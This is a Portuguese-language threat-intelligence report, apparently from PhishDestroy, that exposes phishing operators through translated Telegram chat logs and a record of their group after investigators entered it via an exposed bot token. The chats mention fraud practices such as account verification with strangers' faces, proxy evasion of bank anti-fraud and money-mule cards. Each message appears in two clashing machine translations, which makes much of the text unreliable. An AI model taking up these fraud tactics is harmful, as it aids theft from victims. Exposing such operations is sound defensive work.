-- 💬ONE|Chat (86 mensagens) --
B
Bonya2025-03-05 17:06
Gente, me indiquem uma loja onde eu possa comprar protetores.Gente, me digam onde posso conseguir essas plataformas
B
Bonya2025-03-05 16:22
simplesmente não consigo nem dar uma massagem maníacasimplesmente nem consegue fazer uma manicure
B
Bonya2025-03-05 16:22
da mesma formada mesma forma
B
Bonya2025-03-05 16:21
Porra, me responda se o mentor tem uma sala de bate-papo com os alunos ou não.Caramba, alguém pode me dizer se o orientador tem um chat com os alunos ou não?
B
Bonya2025-03-05 16:10
e de quem é isso?E quem é esse?
B
Bonya2025-03-05 15:44
Não é difícil, mas não há manuais completos aqui, apenas tutoriais.Lá não é difícil, mas não há manuais completos por aqui; só os instrutores é que sabem.
B
Bonya2025-03-05 15:42
Basicamente, sim, se você souber como.Na verdade, sim, se você souber
B
Bonya2025-03-05 15:42
meio diameio dia
B
Bonya2025-03-05 15:42
O primeiro tem 600 pessoas, e ele não está respondendo.Para as primeiras 600 pessoas, ele não responde
B
Bonya2025-03-05 15:41
Se você tiver dinheiro, compre aquele que está sendo vendido por US$ 200.Se você tiver dinheiro, escolha aquela que está pedindo 200 dólares
B
Bonya2025-03-05 13:55
Quem é ótimo em ensinar que existe uma sala de bate-papo para alunos?Quem frequenta o curso de ficção científica lá? Tem algum chat para os alunos?
B
Bonya2025-03-03 15:10
ChequesRecibos
B
Bonya2025-03-03 15:10
Aquele que aspiraQue está passando o aspirador
B
Bonya2025-03-03 15:10
Entendi
B
Bonya2025-03-03 15:10
Provavelmente existem prostitutas que trabalham com software.Mas aí, com certeza, tem uns bugs no software
B
Bonya2025-03-03 15:09
FoiEra
B
Bonya2025-03-03 15:09
Ah, que bom.Ah, isso aí é legal
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinúrio de Ruru
B
Bonya2025-03-03 15:09
E eles estão sendo coletadosE eles são coletados
B
Bonya2025-03-03 15:09
O Tip tá só sentado ali, brincando com as embalagensO cara tá sentado, jogando balas de papel
B
Bonya2025-03-03 15:04
Por que há placas de carro ucranianas?Por que usar números em ucraniano?
B
Bonya2025-03-03 15:03
Eu disse “kc”.Eu disse “kts”
B
Bonya2025-03-03 15:03
Entendi.Eu entendi
B
Bonya2025-03-03 15:03
Se for complicado, você vai perder seu chapéu-coco.Se for complicado aqui, o seu chapéu vai voar
B
Bonya2025-03-03 15:03
Caramba, vamos comparar quantas vezes você vai rodar o vídeo do Facebook enquanto eu tiro o roux do fogo.Caramba, vamos lá, compara quantas vezes você vai dar o recarregamento do Facebook enquanto eu tiro a câmera
B
Bonya2025-03-03 15:02
Para uma acompanhantePara acompanhantes
B
Bonya2025-03-03 15:02
Esses caras têm um jeito meio esquisito de começar a se comportar como uns idiotas de merda.Esses caras têm um jeito de se comportar que dá vontade de mandar o cara se foder
B
Bonya2025-03-03 15:02
Puta que pariu, só tem gente do movimento “woke” por aqui.Caramba, só tem gente trabalhando aqui
B
Bonya2025-03-03 15:02
Que tipo de mesasQue mesas?
B
Bonya2025-03-03 15:01
Você vai ganhar 30 se tiver uma voz bonita.30 serão teus, se a voz for bonita
B
Bonya2025-03-03 15:01
Há mais dinheiroLá tem mais dinheiro
B
Bonya2025-03-03 15:01
Venha trabalhar na minha empresa.Vamos para o centro cultural trabalhar comigo
B
Bonya2025-03-03 15:00
NãoNão
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Não sei como usar o recurso de repetição+ Não entendo nada de jogos
B
Bonya2025-03-03 14:59
É difícil encontrar bons lançamentos.É difícil encontrar itens bons
B
Bonya2025-03-03 14:58
Ou será que existe uma versão 1.0?Ou a versão 1.0 está disponível
B
Bonya2025-03-03 14:58
Só tem 2,0 phish aqui.E aqui estão os fusíveis para corrente de 2,0
B
Bonya2025-03-03 14:58
Ou melhor, 1.0 do que 2.0.Bem, ou melhor, 1.0 do que 2.0
B
Bonya2025-03-03 14:57
Com mamutesCom os mamutes
B
Bonya2025-03-03 14:57
A versão 2.0 não funciona se a gente ficar aí sem fazer nada.2.0: não dá pra ficar aí enrolando
B
Bonya2025-03-03 14:57
Sou mais do tipo que gosta de trânsito.Não sou mais o que tem mais tráfego
B
Bonya2025-03-03 14:57
Aqui estão os “X”s, de RooAqui estão os Xs na mão
B
Bonya2025-03-03 14:56
Mas essas não são equipes de publicidadeMas não se trata de equipes de publicidade
B
Bonya2025-03-03 14:56
É verdade. Conheço alguém que faz isso.(Fazem isso) Tenho conhecidos que fazem isso
B
Bonya2025-03-03 14:56
Mas não é o caso se você souber como ganhar 400-500 por dia.Ora, se você souber fazer isso, dá pra ganhar uns 400-500 por dia
B
Bonya2025-03-03 14:55
Então, qual é o problema?)Bem, o que é que eu esqueci aqui, afinal? )
B
Bonya2025-03-03 14:55
Há um link para o manualLá tem um link para o manual
B
Bonya2025-03-03 14:54
São mãos assimSão essas mãos que vão dar trabalho
B
Bonya2025-03-03 14:54
Ficando babando e olhando com desejo só pra conseguir uma porra de uma mão.Caramba, pra dar uma trepada, dá pra ficar babando e com os olhos virados pra cada lado
B
Bonya2025-03-03 14:54
Bem, qual é o problema? É a mesma coisa.Bem, então qual é o problema? É a mesma coisa.
B
Bonya2025-03-03 14:53
Vai levar um mês para chegar à zonaVão levá-lo até a zona em um mês
B
Bonya2025-03-03 14:53
E não há para onde ir. Se você tiver juízo, vai entender. Se não tiver, pode dar o fora daqui.Além disso, não tem para onde ir... Se tiver juízo, você vai entender; se não tiver, não tem o que fazer aqui.
B
Bonya2025-03-03 14:53
O que você quer?O que você queria?
B
Bonya2025-03-03 14:53
AnúncioPublicidade
B
Bonya2025-03-03 14:52
Estou aqui há dois dias e a versão 2.0 não me parece interessante. Eu achava que era legal.Estou aqui há dois dias e a versão 2.0 não me interessa; achei que fosse algo legal
B
Bonya2025-03-03 14:52
E aproveite à grandeE criar um mamute
B
Bonya2025-03-03 14:52
Use a cabeça para pensar no que dizer.Tenho que pensar no que responder
B
Bonya2025-03-03 14:52
Não há segredosNão há segredos aqui
B
Bonya2025-03-03 14:52
O que ele vai te dar?O que ele vai lhe oferecer
B
Bonya2025-03-03 14:52
Bem, de que adianta se o manual traz exatamente as mesmas informações?Então, qual é o sentido se todo esse tipo de informação está no manual?
B
Bonya2025-03-03 14:51
Ele vai ter tempo para responder a todos os seus idiotasComo vamos conseguir responder a todos vocês?
B
Bonya2025-03-03 14:51
Que treino!Que prática?
B
Bonya2025-03-03 14:51
Tem 100 pessoas lá dentro.Nossa, tem umas 100 pessoas lá com ele
B
Bonya2025-03-03 14:51
Por que você não me dá um pouco de dinheiro que eu te dou o manual da braçadeira?Talvez vocês possam me mandar um dinheiro; eu te dou o manual do reforço
B
Bonya2025-03-03 14:50
Ao fixarNa fixação
B
Bonya2025-03-03 14:50
Você não precisa de um manual para aprender tudo isso.E que se dane o treinamento de vocês, o manual já está aí
B
Bonya2025-03-03 14:50
A versão 2.0 é o que é.2.0 O que era, assim é
B
Bonya2025-03-03 14:50
Qual é a porra do problema?Que problema é esse, afinal?
B
Bonya2025-03-03 14:48
Foi você mesmo quem começou isso?Você já começou?
B
Bonya2025-03-03 14:48
Não é loucuraDe jeito nenhum funciona
B
Bonya2025-03-03 14:48
Tem um acesso no lkNo LK há um assassinato
B
Bonya2025-03-03 14:48
Qual é a situação com o lk?Que tipo de trabalho no LC?
B
Bonya2025-03-03 14:48
Qual desses vocês são, seus idiotas, como vocês mesmos disseram?De quem são esses “foda-se”, como você disse?
B
Bonya2025-03-03 14:47
Não estou entendendo o que você está dizendo aqui.Aqui não entendi o que você disse
B
Bonya2025-03-03 14:46
Se estiverem conectados, ótimo.Se entrarem no LK, então ZBS
B
Bonya2025-03-03 14:46
Bem, eles fazem login?Então, vocês entram no LK?
B
Bonya2025-03-03 14:45
Não sei como eles filmam isso.Sabe, eu não faço ideia de como eles são filmados
B
Bonya2025-03-03 14:45
Cachorrinhos para dar como perdidos?Quer assinar a revista?
B
Bonya2025-03-03 14:45
Caramba, tem um botão, porra!Que se dane, ainda tem que bater na porta
B
Bonya2025-03-03 14:42
Estou servindo eu mesmoSou eu mesmo que estou servindo
B
Bonya2025-03-03 14:42
Eu percebi, porra, que isso não é pra qualquer um.Caramba, eu entendi que isso não é pra caralho
B
Bonya2025-03-03 14:41
Cara, aqui não vendem nada com fichas, é uma ficha de dia de pagamento.Cara, aqui não vendem nada com fichas; aqui as fichas são para pagamento
B
Bonya2025-03-03 14:41
Eu entendo, não tem onde colocar issoEntendi, não tem onde despejar isso aqui
B
Bonya2025-03-03 14:40
Acho que é a versão Regular 2.0.Os 2.0 comuns, tipo...
B
Bonya2025-03-03 14:40
Não é como se eles estivessem sobrecarregando o tráfegoEntão, aqui não direcionam tráfego
-- FbStor - Chat dos Webmasters de Sucesso! (23 mensagens) --
B
Bonya2025-02-26 07:51
Bem, faz o que der na sua, cara.Pois é, faz o que quiser com o rosto de quem for lá
B
Bonya2025-02-26 07:50
Um estudante, 200₽.Bem, vou dar 200₽ para a aluna
B
Bonya2025-02-26 07:50
Vai dar certoDá pra rolar
B
Bonya2025-02-26 07:50
Você vai encontrar um morador de rua na rua.Na rua, pegue um morador de rua e passe por ele
B
Bonya2025-02-26 07:50
Então, todo mundo acredita no próprio rosto, não importa de quem seja.Então todo mundo faz a verificação com a própria foto lá, quem se importa com o que dizem?
B
Bonya2025-02-26 07:50
Na sua cara.Por conta própria
B
Bonya2025-02-26 07:49
Mas o fato é que, seja como for, já fiz isso dez vezes.Mas, na verdade, dane-se, eu já verifiquei umas 10 contas
B
Bonya2025-02-26 07:49
Então me diga, você só está falando bobagem.Então, me diga: você está espalhando boatos?
B
Bonya2025-02-26 07:49
Você podeÉ possível
B
Bonya2025-02-26 07:49
Na sua cara.Por conta própria
B
Bonya2025-02-16 20:26
em vez de acabar com eles com algum tipo de treinamento e colocá-los no meio do trânsito.e não é tipo enrolar com algum tipo de treinamento e direcionar tráfego para eles
B
Bonya2025-02-16 20:25
é normal no UBT, no YouTube, etc.os vídeos normais do UBT, TT, YouTube e assim por diante
B
Bonya2025-02-15 17:31
XzХз
B
Bonya2025-02-15 17:31
Sob o pretexto de treinamentoSob o pretexto de um treinamento
B
Bonya2025-02-15 17:31
Para os canaisPara os canais
B
Bonya2025-02-15 17:31
É só o movimento das pessoas.É só que o tráfego causado pelas pessoas dá trabalho
B
Bonya2025-02-15 17:31
Então, o cara diz para se inscrever em todos os canais deleEntão, o cara diz para a gente se inscrever em todos os canais dele
B
Bonya2025-02-15 16:36
Você não precisa escreverHui Nyu sugere que vocês não escrevam
B
Bonya2025-02-06 15:11
Se você não souber o básico sobre como servir, vai acabarSe você não souber o básico, como, por exemplo, como moldar, então...
B
Bonya2025-02-06 15:11
Tem um botão para alterar o aipi; você deveria pelo menos pesquisar no Google.Ao clicar nesse botão, o IP muda; se quiser, dá uma pesquisada no Google
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Você pode ajustar o aipi girando-o.Lá, é possível alterar a rotação do AIPI
B
Bonya2025-02-06 15:09
Por que 1? É o mesmo celularPor que 1? Afinal, são os dispositivos móveis
-- CryptoGrab - Chat de ajuda mútua (10 mensagens) --
B
Bonya2025-02-06 15:31
Não é tão simples assimNão é tão simples assim
B
Bonya2025-02-06 15:31
Fácil.Izi
B
Bonya2025-01-23 20:30
Nem um único exemploNão há um único exemplo
B
Bonya2025-01-23 20:30
Não tem graça nenhuma eu não ter conseguido encontrar nenhum anúncio de exames de LMA na internet.É engraçado que eu não encontrei absolutamente nenhuma propaganda dos testes AML na internet
B
Bonya2025-01-23 17:20
Não há absolutamente nada no AML.No AML não tem absolutamente nada
B
Bonya2025-01-23 17:20
Tentei usar o AML no Facebook para encontrar arquivos americanos, inclusive pacotes antigos que não são encontrados na internetTentei procurar no Facebook, mas não encontrei nem mesmo grupos antigos que fizessem sentido na internet.
B
Bonya2025-01-23 17:19
Bem, que tipo de oferta você está planejando?Bem, de qualquer forma, que tipo de oferta você está planejando?
B
Bonya2025-01-23 17:16
Você usa o AML?E você, joga AML?
B
Bonya2025-01-21 20:38
Quem trabalha com FB gostaria de esclarecer algumas dúvidasTem alguém que faz campanhas no Facebook? Gostaria de esclarecer algumas dúvidas.
B
Bonya2025-01-20 11:08
Alguém tem algum exemplo de CREOS para AML?Alguém tem exemplos de criativos para o AML?
-- Rolex | chat geral (28 mensagens) --
B
Bonya2024-09-11 15:29
O que os lituanos estão fazendo em qual quadra?E a Lituânia está levando uma surra em qual plataforma?
B
Bonya2024-09-11 15:21
Você tá mexendo com o parafuso?Você tá enlouquecendo, né?
B
Bonya2024-09-11 15:20
É que esses sites são muito restritivos e dá muito trabalho lidar com elesÉ que essas plataformas limitam muito o trabalho e dá um monte de trabalho lidar com elas
B
Bonya2024-09-11 15:19
Tenho uma ideia em mente. Se eles fizerem isso, vai ser incrível pra caramba.Eu pensei em um tema lá e escrevi; se eles fizerem, vai ficar irado
B
Bonya2024-09-11 15:19
Não vejo muitos troncos na fazenda.Não vejo muitos logotipos na Finke, na verdade
B
Bonya2024-09-11 15:19
Tem uma confusão danada rolando com todas as casas de show.Ah, qual é! Esses caras estão com alguma confusão com todas as plataformas
B
Bonya2024-09-11 15:16
É isso mesmo que estou dizendo, é como um Ford em cima de outro Ford.Pois é, eu tô dizendo que é fraude em cima de fraude
B
Bonya2024-09-11 15:15
Não consigo entender o que está melhor agora; vejo que ninguém na Finlândia está trabalhando.Não consigo entender o que está funcionando melhor agora; vejo que, pelo que parece, algo não está funcionando para todo mundo
B
Bonya2024-09-11 15:08
Bem, as chances são de 50/50 de você ter sorte com os proxies.Bem, 50/50, se der sorte com os proxies
B
Bonya2024-09-11 15:07
Mas, só para você entender, hoje em dia, com os proxies de luxo, até mesmo no Viber, quando você faz login, o aplicativo enlouquece.Mas, só pra você entender: agora, com esses proxies de luxo, até no Viber, quando você entra, dá problema.
B
Bonya2024-09-11 15:07
Bem, não sei nada sobre as latas da UE.Bem, eu não entendo nada de bancos europeus
B
Bonya2024-09-11 15:07
Em lkNo perfil
B
Bonya2024-09-11 15:06
Antigamente, as delicatessens tinham 10 câmaras frigoríficasAntigamente, os esmaltes de 10 camadas duravam mais
B
Bonya2024-09-11 15:06
Bem, o 922 também está em 1º lugar e mantém a posição.Bem, o 922 também entra em 1º e se mantém lá
B
Bonya2024-09-11 15:05
Mesmo depois de três consultas, isso ainda os deixa apavorados.Mesmo no privado, depois de três tentativas, a Frodi os engana
B
Bonya2024-09-11 15:05
Se 1 procurador representar 1 ou 2 bancosSe 1 proxy for 1-2 bancos de corrente
B
Bonya2024-09-11 15:05
Bem, depende de qual bancoBem, depende do banco
B
Bonya2024-09-11 15:04
Os representantes costumam ser uns nojentos nessa bobagem de laksheriNos sites de luxo, os proxies costumam estar infectados
B
Bonya2024-09-11 08:44
Ele está dormindo?E ele está dormindo?
B
Bonya2024-09-11 08:40
Ah, que ótima ideia.Foi o ZBS quem teve essa ideia
B
Bonya2024-09-11 08:40
Não tem lá tipo um mercado de pulgas ou algo assim?E por que é que eles não têm, tipo, feiras de pulgas por aí?
B
Bonya2024-09-11 08:40
Que merda!Huevo
B
Bonya2024-09-11 08:39
BilyaBilyá
B
Bonya2024-09-11 08:39
Existem salas de bate-papo?E tem salas de bate-papo por lá?
B
Bonya2024-09-11 08:38
Alguém sabeAlguém sabe?
B
Bonya2024-09-11 08:38
As pessoas em Finca usam o TG?As pessoas usam o Telegram na Finlândia?
B
Bonya2024-09-10 12:14
Obrigado.Valeu
B
Bonya2024-09-10 12:13
Que horas são na Finlândia?Vou dar uma passada agora na Finka
-- Atualidades/verificações/ganhos💃🛍 (37 mensagens) --
B
Bonya2024-06-16 17:17
Não vejo ninguém defendendo-a com unhas e dentesNão vejo aqui defensores ferrenhos dela
B
Bonya2024-06-16 17:17
Bem, a situação foi explicada e, a partir daí, cada um faz sua própria escolha; e o fato de que apenas o administrador Pasha a está defendendo diz muito.Bem, já expliquei a situação; agora cada um decide por si mesmo, e o fato de que só o administrador Paşa a defende diz muito.
B
Bonya2024-06-16 17:15
E ela não pagou de novoE ela, mais uma vez, não pagou
B
Bonya2024-06-16 17:15
Não, ela transferiu o dinheiro para nós, mas não tínhamos a conta principal para transferir o dinheiro, então escrevemos para a Vika como último recurso.Não, ela repassou isso para a gente, mas não tínhamos o método de pagamento principal para transferir o dinheiro e, como último recurso, escrevemos para a Vike.
B
Bonya2024-06-16 17:14
No começo, a gente também estava bem, mas ultimamente seu dinheiro tem sumido o tempo todo.No começo, tudo estava normal para nós também, mas ultimamente o dinheiro de vocês está sumindo o tempo todo
B
Bonya2024-06-16 17:14
Estou fazendo spam? Estou aqui apenas dizendo a verdade para as pessoas. Você pode ignorar isso. Deixe as pessoas saberem como você trabalha.E eu estou mandando spam? Estou aqui contando a verdade para as pessoas; pode apagar isso, o que vai mudar? Que as pessoas saibam como vocês trabalham.
B
Bonya2024-06-16 17:13
Quando você tiver um dessesQuando isso acontecer com você
B
Bonya2024-06-16 17:13
Então, é hora de você refletirEntão, é hora de vocês refletirem
B
Bonya2024-06-16 17:13
Também já trabalhamos com a nei há muito tempo e esta é a segunda vez que isso aconteceNós também já trabalhamos com ela há muito tempo e essa já é a segunda situação
B
Bonya2024-06-16 17:13
E ela registrou os gs e disse: “Você sabe como funciona”.E ela gravou o GS e disse que você sabe como ele funciona
B
Bonya2024-06-16 17:13
É exatamente isso que rolou. Vamos começar do início: pegamos o cartão dela para depositar dinheiro, colocamos 60 mil, ela foi sacar e escreveu que o dinheiro não estaria lá porque o caixa eletrônico engoliu o cartão, e pronto, acabamos de jogar 60 mil fora.É exatamente isso: vamos começar do início. Pegamos o cartão dela, depositamos 60 mil, ela foi sacar o dinheiro e disse que não teria dinheiro, alegando que o caixa eletrônico teria engolido o cartão. Resumindo, acabamos perdendo os 60 mil.
B
Bonya2024-06-16 17:11
Não é ela quem nos controlaE não somos nós que estamos com ela?
B
Bonya2024-06-16 17:11
Embora tenhamos realmente tido 60 mil roubadosEmbora tenham nos roubado 60 mil
B
Bonya2024-06-16 17:11
Normal? Já explicamos tudo aqui. Você tá dizendo que a gente é um bando de idiotas.“Normais?” Nós já explicamos tudo aqui, e vocês dizem que somos idiotas
B
Bonya2024-06-16 17:10
Você está defendendo elaVocê a defende
B
Bonya2024-06-16 17:10
Ela ainda está com o nosso dinheiroNosso dinheiro ficou com ela
B
Bonya2024-06-16 17:10
Todos elesTudo
B
Bonya2024-06-16 17:10
Disseram que um cara ganhou 60 mil, mas ela disse que não tinha dinheiro.Quando deram 60 mil a essa pessoa, ela disse que não haveria dinheiro
B
Bonya2024-06-16 17:10
Descrito*Descreveram*
B
Bonya2024-06-16 17:10
A situação toda já foi explicada a vocêJá te explicaram toda a situação
B
Bonya2024-06-16 17:09
Quem é que está desistindo? Ela ou a gente.Quem é o culpado: ela ou nós?
B
Bonya2024-06-16 17:09
Temos 60 mil no banco. Onde está o dinheiro?Investiram 60 mil. Onde está o dinheiro?
B
Bonya2024-06-16 17:09
A situação já foi toda explicada para você, não importa qual seja o seu sexo.Quais mulheres te explicaram toda a situação? O gênero não importa, de forma alguma.
B
Bonya2024-06-16 17:08
Pegue 60 mil e encerre o dia.Ganhar 60 mil e dar o fora
B
Bonya2024-06-16 17:08
Ou vou te foder, dentro do razoável.Ou, caramba, o que vocês têm, dentro do razoável?
B
Bonya2024-06-16 17:08
As pessoas não têm como pagarDe onde as pessoas vão tirar dinheiro para pagar?
B
Bonya2024-06-16 17:08
E ele diz que o cartão ficou danificado e que não tem mais dinheiro.E ele diz que o cartão travou, não tem dinheiro
B
Bonya2024-06-16 17:08
Um cara ganhou 60 mil, e ela foi filmar.Derramaram 60 mil sobre a mulher, e ela foi filmar
B
Bonya2024-06-16 17:07
Então, você vai me contar os fatos.Então, justifique com base nos fatos
B
Bonya2024-06-16 17:07
Então, quem diabos é o culpado? Quem é o idiota que eu sou?Então, quem é o culpado, porra? Quem é o idiota aqui, eu?
B
Bonya2024-06-16 17:07
Não tem nada a dizer?Não tem nada a dizer?
B
Bonya2024-06-16 17:07
Ou eu não conseguia digitar a porra do PIN.Ou será que, por que diabos, com essas mãos tortas, ela não conseguiu digitar o “pin”?
B
Bonya2024-06-16 17:06
Como diabos um caixa eletrônico poderia prender o cartão?Como diabos o caixa eletrônico conseguiu engolir o cartão?
B
Bonya2024-06-16 17:06
ChupetasSucções
B
Bonya2024-06-16 17:06
E você tá se esforçando pra caramba por ela.E por que diabos vocês estão baixando isso por ela?
B
Bonya2024-06-16 17:06
Vocês, seus malditos “naturais”, são uns idiotas de merda. Tem uma mulher aqui se mexendo com o dinheiro dela e o cartão dela foi engolido pelo caixa eletrônico.Caramba, vocês são mesmo uns idiotas! Tem uma porra sentada na sua avó, e ela fica surtando achando que o caixa eletrônico engoliu o cartão dela.
B
Bonya2024-06-16 16:40
@kysia1987, não é golpe, dei um dropkick e me juntei aos 60 mil@kysia1987 Não funciona, é um golpe; o preço caiu um pouco e eu perdi 60 mil

MONETTI ESCOBAR: O Chefe Silencioso

Em nítido contraste com as 261 mensagens de Bonya, MONETTI tem apenas 10 mensagens públicas — tudo em um único tópico no TraFFeeQ Chat (Arbitragem de tráfego ADS/SEO de sites de conteúdo obsceno), em defesa de um colega:

TraFFeeQ ChatDezembro de 2025
"Um homem faz o seu trabalho, recebe por isso — tem alguma objeção?"
A pessoa faz o seu trabalho, recebe pelo trabalho, o que há para discutir?)
Normalizar as atividades criminosas como “apenas um trabalho”
TraFFeeQ ChatDezembro de 2025
"Não há nada a discutir com você"
Não há nada a discutir com você
Autoridade desdenhosa — mentalidade de chefe, acima de qualquer debate
TraFFeeQ ChatDezembro de 2025
"Tem muita coisa pra fazer além de você!"
Sem você, tenho o que fazer)
Isso implica várias operações simultâneas que exigem a atenção dele

Os grupos do Telegram da MONETTI contam o resto: Medusa Google Ads (fraude de PPC do tipo “black-hat”), um Canal sobre deepfakes (meios sintéticos para fraude), e CHAT DE MARLBORO (privado, desconhecido). A assinatura do Telegram Premium, atendimento 24 horas por dia, 7 dias por semana, e “Есть предложение” ("Tenho uma proposta") O perfil profissional dele dá a impressão de que trata o crime cibernético como um negócio em tempo integral.

MONETTI ESCOBAR: Histórico completo de mensagens (10 mensagens)
MONETTI ESCOBAR (@monettiescobar) — Histórico completo das mensagens traduzidas
-- TraFFeeQ Chat | Arbitragem de tráfego | Black ADS/SEO | (9 mensagens) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Deixa isso pra lá!Deixa isso pra lá!
ME
MONETTI ESCOBAR2025-12-06 20:42
Um homem faz o seu trabalhoA pessoa está fazendo seu trabalho
ME
MONETTI ESCOBAR2025-12-06 20:42
Sem agressãoNenhuma agressão
ME
MONETTI ESCOBAR2025-12-06 20:40
Não se preocupe com isso tambémNão se preocupe com isso também
ME
MONETTI ESCOBAR2025-12-06 20:39
Conversa com ele, cara. Ele não está proibido de fazer isso.Conversa com ele, cara, ninguém o proibiu de fazer isso
ME
MONETTI ESCOBAR2025-12-06 20:39
Tem muita coisa pra fazer além de você!)Tem outras coisas pra fazer além de você!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Não há nada a discutir com vocêNão há nada a discutir com você
ME
MONETTI ESCOBAR2025-12-06 20:38
Está escrito ao lado do apelido dele. Não precisa clicar, você vai ler mesmo.Ao lado do apelido dele está escrito: “Não use o ‘tu’, leia isso”.
ME
MONETTI ESCOBAR2025-12-06 20:38
O cara faz o trabalho dele, recebe pelo isso (gostaria de discutir)A pessoa faz o seu trabalho, recebe dinheiro por isso; se quiser, pode discutir o assunto)
-- Medusa | Google Ads | Chat (1 mensagem) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Perfil do MONETTI ESCOBAR no Telegram
Captura de tela 2 — Perfil do MONETTI no Telegram.
Perfil do Bonya no Telegram
Captura de tela 3 — Perfil de Bonya. Observe o DC2 (Amsterdã).

Seção 7: A Sala de Pânico

Depois que o PhishDestroy acessou o grupo de operadores por meio do bot do Telegram que estava exposto, ocorreu a seguinte troca de mensagens. O registro da conversa abaixo foi traduzido para o inglês, com o texto original em russo preservado em itálico. A identidade usada para o acesso foi ocultada.

Grupo de Operadores — “Cartão Idr” — Histórico completo do chat (61 mensagens)
— REDACTED acessou o sistema por meio de um token de bot exposto —
R
OCULTADO25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
QuemQuem
B
Bonya25-03-2026 13:07:14
XzХз
R
OCULTADO25-03-2026 13:07:14
Olá, basta salvar seus dados e aguardar um minuto
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Que porra é essa?Que porra é essa?
B
Bonya25-03-2026 13:07:27
Foda-seFoda-se
B
Bonya25-03-2026 13:07:28
É essa pessoaQuem é quem
ME
MONETTI ESCOBAR25-03-2026 13:07:42
É mesmo.Ahahaha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Que porra é essa?Que merda
B
Bonya25-03-2026 13:07:53
O bot foi comprometidoO bot foi hackeado
B
Bonya25-03-2026 13:08:16
Disseram-me que nossa defesa está uma bagunça.Aliás, me disseram que a nossa defesa é de arrasar
B
Bonya25-03-2026 13:08:22
Bem, existe um tipoBem, tem um cara lá
B
Bonya25-03-2026 13:08:43
É como invadir um bot por meio de um phishing.É muito fácil quebrar o bot usando o Fish, é como bater um dedo no outro
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[OCULTADO].[OCULTADO]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Quem é esse?Quem é esse?
B
Bonya25-03-2026 13:10:29
Verifique seu perfil.Dá uma olhada no seu perfil
B
Bonya25-03-2026 13:10:32
É um hackerEsse é um hacker
B
Bonya25-03-2026 13:10:35
Literalmente.No sentido literal
B
Bonya25-03-2026 13:10:41
Traduziu o que ele está canalizandoTraduziram o que ele escreveu no canal
B
Bonya25-03-2026 13:10:55
[OMITIDO — Bonya copia e cola a mensagem do canal que denunciou seu domínio, tentando identificar quem os denunciou]
B
Bonya25-03-2026 13:12:19
Então, hum.Bem, enfim...
B
Bonya25-03-2026 13:12:23
Eu não faço a menor ideia de quem seja essa pessoa.Só Deus sabe quem é esse
B
Bonya25-03-2026 13:12:25
Mas não para sempreMas não é nada bom
B
Bonya25-03-2026 13:12:47
@devosus, vamos pensar na defesa antes que a gente leve uma surra.@devosus, pense em uma defesa antes que a gente leve uma surra
Nota do editor: Bonya sente que isso está por vir. Suponhamos que ele seja russo e considere “patriótico” enganar a Ucrânia. E quanto à Indonésia — um Parceiro do BRICS desde outubro de 2024 (Cúpula de Kazan)? Será que roubar os cidadãos dos próprios aliados também é patriótico? Os golpistas da CEI são ladrões que não fazem distinção de alvo, sem inteligência e sem lealdade alguma. Leia nossas outras investigações, nas quais documentamos processos judiciais para operadores semelhantes — o desfecho é sempre o mesmo.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
É, eu entendo isso.Sim, eu vejo
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Vai se foder.Que besteira é essa?
B
Bonya25-03-2026 13:13:09
Bem, ficar sem energia também não é nada emocionante.Bem, ficar chapado também não é lá essas coisas
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Ele não vai fazer nadaEle não vai fazer nada
ME
MONETTI ESCOBAR25-03-2026 13:13:18
O que ele vai fazer?O que ele vai vender?
D
Devoys25-03-2026 13:13:26
o que é issoo que é isso
ME
MONETTI ESCOBAR25-03-2026 13:13:34
É, um cara entrouO cara entrou
D
Devoys25-03-2026 13:13:34
de ondede onde
B
Bonya25-03-2026 13:13:35
Mesmo que você tenha acessado o site de phishing algumas vezes com seu próprio IP, isso já não é mais legal.Mesmo que eu já tenha entrado no Fish algumas vezes pelo meu IP, isso já não é mais divertido
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Ao grupoPara o grupo
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
quando se usa o `interpol`quando na Interpol
D
Devoys25-03-2026 13:13:41
para o qualpara qual
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Este aquiEsta
B
Bonya25-03-2026 13:13:46
Só vim aqui pra bater um papoEntra aqui no chat
B
Bonya25-03-2026 13:13:49
Ele escreveu queEscreveu que
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Olá, basta salvar seus dados e aguardar um minuto
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto compartilhada]
D
Devoys25-03-2026 13:14:31
Já os vi antes.Já vi coisas assim
B
Bonya25-03-2026 13:14:44
Bem, também fomos pegos por causa do bot do Ukr.Bem, a gente também foi atacado pelo bot ucraniano
B
Bonya25-03-2026 13:14:55
Você não mandou nenhuma mensagem na sala de bate-papo.Não escreveram nada no chat
B
Bonya25-03-2026 13:14:57
Você não escreveuAh, mas escreveram
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Não dou a mínima.Ah, e que se dane
B
Bonya25-03-2026 13:15:06
Em nome do canalEm nome do canal
D
Devoys25-03-2026 13:15:23
Esqueça isso de uma vez por todas.deixa pra lá, porra
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Vou acabar com esse grupoVou excluir esse grupo
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
simsim
— Grupo excluído pelo proprietário —

O grupo foi excluído em questão de minutos. O reconhecimento de despedida de Bonya — “+” — e a confirmação de Devoys com “sim” dizem tudo: eles sabiam que estavam desmascarados, e a única saída que tinham era destruir as provas. Mas, naquele momento, os dados já haviam sido coletados.

